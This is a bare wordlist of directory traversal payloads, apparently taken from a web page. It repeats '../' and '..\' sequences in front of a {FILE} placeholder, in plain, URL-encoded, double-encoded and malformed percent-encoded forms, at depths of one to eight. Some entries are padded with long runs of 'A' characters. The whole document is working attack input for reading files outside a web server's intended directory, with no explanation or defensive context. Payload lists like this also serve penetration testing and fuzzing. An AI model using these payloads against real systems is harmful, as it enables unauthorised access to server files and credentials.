..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
